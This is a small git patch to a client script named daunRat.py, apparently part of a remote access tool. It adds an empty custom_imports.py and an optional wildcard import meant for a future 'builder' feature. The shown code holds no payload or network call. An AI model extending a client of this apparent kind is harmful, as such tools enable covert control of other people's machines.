From e4198f4fa0daedfeef40efd0157ece05bd6de829 Mon Sep 17 00:00:00 2001 From: BarsTiger Date: Wed, 18 May 2022 21:26:37 +0300 Subject: [PATCH] added custom_imports.py for builder functionality, when it will appear --- client/custom_imports.py | 0 client/daunRat.py | 4 ++++ 2 files changed, 4 insertions(+) create mode 100644 client/custom_imports.py diff --git a/client/custom_imports.py b/client/custom_imports.py new file mode 100644 index 0000000..e69de29 diff --git a/client/daunRat.py b/client/daunRat.py index 8d00e7f..d4a60db 100644 --- a/client/daunRat.py +++ b/client/daunRat.py @@ -9,6 +9,10 @@ import os sys.path.append('daun/modules') import daun.modules as daun # needed to use daun functionality from admin from modules.selfutil import daunrat # needed to use self utility functions +try: + from custom_imports import * +except ImportError: + pass client_id = str()